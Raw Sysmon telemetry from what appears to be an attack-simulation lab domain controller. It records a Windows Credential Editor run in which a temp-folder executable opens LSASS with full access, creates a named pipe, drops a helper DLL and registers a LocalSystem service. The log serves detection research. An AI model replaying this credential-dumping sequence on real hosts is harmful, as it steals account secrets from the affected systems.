21:10:07.139{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lbwacldr.o5k.ps12021-06-23 21:10:07.139 10341000x800000000000000025348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.108{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9DB592F0DAE85FDAFE615D94FE300EA,SHA256=24472894D1A9BD3674BE52AC3A84D3AB54CAD7B0712F39225D104EB5B68232FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.092{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000025345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000025343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.077{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
10341000x800000000000000025485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.890{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.890{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+25cc|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
11241100x800000000000000025483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:10:17.890{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exeC:\Windows\Temp\wceaux.dll2021-06-23 21:10:17.874 18141800x800000000000000025482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-ConnectPipe2021-06-23 21:10:17.874{4DB9351A-A339-60D3-5206-00000000CF01}6980\WCEServicePipeC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe 17141700x800000000000000025481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:17.874{4DB9351A-A339-60D3-5306-00000000CF01}5972\WCEServicePipeC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe 10341000x800000000000000025480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDB-60D3-0A00-00000000CF01}620684C:\Windows\system32\services.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.874{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}6202864C:\Windows\system32\services.exe{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\system32\services.exe+21fc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1
ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000025473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.873{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe-----C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe -SC:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\System32\services.exeC:\Windows\system32\services.exe 13241300x800000000000000025472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\ObjectNameLocalSystem 13241300x800000000000000025471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\DisplayNameWCESERVICE 13241300x800000000000000025470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localT1031,T1050SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\ImagePathC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe -S 13241300x800000000000000025469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\ErrorControlDWORD (0x00000000) 
13241300x800000000000000025468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localT1031,T1050SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\StartDWORD (0x00000003) 13241300x800000000000000025467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:17.859{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\TypeDWORD (0x00000010) 10341000x800000000000000025466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.843{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4